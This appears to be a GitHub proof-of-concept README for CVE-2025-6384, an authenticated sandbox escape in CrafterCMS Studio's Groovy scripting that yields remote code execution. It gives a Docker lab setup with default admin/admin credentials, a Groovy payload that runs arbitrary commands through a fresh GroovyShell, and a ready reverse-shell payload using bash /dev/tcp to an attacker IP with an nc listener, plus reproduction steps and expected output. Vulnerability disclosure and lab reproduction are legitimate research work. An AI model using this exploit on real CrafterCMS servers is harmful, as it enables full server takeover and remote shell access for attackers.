# CrafterCMS Authenticated RCE - Groovy Sandbox Bypass (CVE-2025-6384)

A Proof of Concept for an authenticated Remote Code Execution vulnerability in CrafterCMS.

## Vulnerability Summary

An authenticated user with developer privileges can bypass the Groovy script sandbox in Crafter Studio to achieve Remote Code Execution (RCE). The sandbox fails to block the instantiation of a new `GroovyShell`, which can be used to create a new, unrestricted execution environment.

- **Product:** CrafterCMS
- **Component:** Crafter Studio
- **Vulnerability:** Authenticated RCE via Groovy Sandbox Bypass ([CWE-913](https://cwe.mitre.org/data/definitions/913.html))
- **Impact:** Full server compromise

## Lab Setup / Deployment

You can quickly deploy a vulnerable CrafterCMS instance for testing using the official Docker Compose files.

1.  Clone the `docker-compose` repository from CrafterCMS:
    ```bash
    git clone https://github.com/craftercms/docker-compose.git
    ```

2.  Navigate to the authoring environment directory:
    ```bash
    cd docker-compose/authoring
    ```

3.  Start the containers. This will download the necessary images and start the CrafterCMS stack.
    ```bash
    docker-compose up
    ```
    *(Note: `sudo` may be required depending on your Docker installation.)*

4.  Wait for the services to be fully initialized. You can access Crafter Studio at `http://localhost:8080/studio`.
    - **Default Username:** `admin`
    - **Default Password:** `admin`

## Proof of Concept (PoC)

While the sandbox correctly blocks direct execution methods, it allows the following payload, which creates a new, unsandboxed Groovy shell.

```groovy
// File: /scripts/interceptors/pwn.groovy

def shell = new GroovyShell()
def command = "id" // <-- Your command here
def result = shell.evaluate("'''${command}'''.execute().text")

// The output is printed to the server logs
System.err.println("[RCE-PoC] " + result)
```

## RCE Exploit: Reverse Shell

This payload demonstrates full RCE by establishing a reverse shell back to an attacker-controlled machine.

#### 1. Start a Listener
On your machine, start a listener (e.g., using `netcat`) to receive the incoming connection:
```bash
nc -lvnp 4444
```

#### 2. Prepare the Payload
Use the following Groovy script as your payload. **Remember to replace `<YOUR_IP>` and `<YOUR_PORT>`** with your listener's IP address and port.

```groovy
// File: /scripts/interceptors/exploit.groovy

def attacker_ip = "<YOUR_IP>"
def attacker_port = "4444" // Or <YOUR_PORT>

def cmd = "bash -i >& /dev/tcp/" + attacker_ip + "/" + attacker_port + " 0>&1"
def shell = new GroovyShell()

// Use triple quotes to handle the command string easily
shell.evaluate("""
    new ProcessBuilder("/bin/bash", "-c", "${cmd}").start()
""")

System.err.println("Reverse shell payload executed.")
```


## Steps to Reproduce

1.  Log in to Crafter Studio (`http://localhost:8080/studio`) with the default credentials (`admin` / `admin`).
2.  Navigate to **Site Config** -> **Scripts**.
3.  Click **Create/Edit Script** under the "Groovy Scripts" section.
<img width="1920" height="947" alt="image" src="https://github.com/user-attachments/assets/d9dcd095-5411-4f36-b061-1efe1cb59201" />

4.  Choose a script type that will be executed, such as **Request Interceptor**.
5.  Paste the PoC payload into the script editor and save it.
<img width="1840" height="732" alt="image" src="https://github.com/user-attachments/assets/56802538-4e0b-44a2-8c7c-de93087f6ed6" />

6.  Trigger the script by visiting any page on the website (e.g., `http://localhost:8080`).
7.  Check the server's standard error logs to see the command output.
    - For the **PoC**, find your container ID and check its logs for the command output:
    ```bash
    docker-compose logs -f crafter
    ```
    **Expected Output:**
    ```
    GroovyShell: uid=1000(crafter) gid=1000(crafter) groups=1000(crafter)
    ```
    <img width="1522" height="342" alt="image" src="https://github.com/user-attachments/assets/299ccfbb-685a-4a9c-a77a-eca2e1722b0f" />
    
    - For the **Reverse Shell**, check your `netcat` listener. You should receive a shell session from the container.
      <img width="742" height="319" alt="image" src="https://github.com/user-attachments/assets/eeb27e84-37da-4e0f-9f88-142f6de4d1b0" />



## Disclaimer

This material is for educational and research purposes only. The author is not responsible for any misuse or damage caused by this information.
